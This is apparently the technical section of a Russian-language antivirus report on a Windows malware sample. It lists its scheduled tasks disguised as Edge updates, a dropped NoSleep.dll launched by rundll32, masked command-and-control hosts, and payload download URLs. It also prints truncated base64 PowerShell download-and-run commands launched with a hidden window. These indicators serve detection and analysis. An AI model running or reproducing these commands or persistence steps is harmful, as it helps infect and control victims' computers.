Техническая информация
- <SYSTEM32>\tasks\microsoftedgeupdatetaskmachinecore{1575cc8a-457a-1700-652a-6bf2b031a266}
- %WINDIR%\tasks\microsoftedgeupdatetaskmachinecore{1575cc8a-457a-1700-652a-6af2b031a266}.job
- <SYSTEM32>\tasks\microsoftedgeupdatetaskmachinecore{1575cc8a-457a-1700-652a-6af2b031a266}
- %APPDATA%\nosleep.dll
- %ALLUSERSPROFILE%\qcvwubgtemgfr.jsonip
- '62.##4.41.69':80
- 'dr####gdhfhf.com':80
- 'google.com':80
- http://62.##4.41.69/dll.png
- http://62.##4.41.69/ldn.dll
- DNS ASK dr####gdhfhf.com
- DNS ASK google.com
- '<SYSTEM32>\cmd.exe' /c powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoAC...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoAC...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABw...
- '<SYSTEM32>\cmd.exe' /c rundll32 %APPDATA%\NoSleep.dll ChkdskExs
- '<SYSTEM32>\rundll32.exe' %APPDATA%\NoSleep.dll ChkdskExs